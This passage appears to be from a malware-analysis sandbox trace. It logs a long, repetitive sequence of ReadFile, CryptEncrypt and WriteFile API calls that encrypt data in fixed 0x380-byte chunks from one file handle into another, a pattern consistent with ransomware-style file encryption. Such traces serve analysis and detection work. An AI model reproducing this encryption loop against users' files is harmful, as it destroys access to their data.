lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.614] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.614] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.614] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.615] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.615] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.615] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.615] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.615] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.615] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.615] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.615] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.615] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.615] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.615] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.615] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.616] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.616] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.616] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.616] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.616] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.616] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.616] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.616] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.616] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.616] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.616] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.616] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.616] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.616] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.617] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.617] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.617] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.617] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.617] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.617] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.617] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.617] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.617] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.617] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.617] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.617] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.617] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.618] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.618] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.618] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.618] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.618] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.618] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.618] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.618] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.618] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.618] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.618] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.618] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.618] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.618] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.619] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.619] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.619] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.619] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.619] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.619] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.619] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.619] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.619] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.619] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.619] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.619] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.619] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.620] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.620] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.620] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.620] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.620] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.620] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.620] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.620] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.620] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.620] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.620] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.620] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.620] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.620] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.621] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.621] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.621] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.621] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.621] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.621] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.621] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.621] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.621] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.621] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.621] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.621] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.621] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.622] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.622] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.622] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.622] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.622] CryptEncrypt (in: hKey=0x2fad48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.622] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.622] ReadFile (in: hFile=0x5d48, 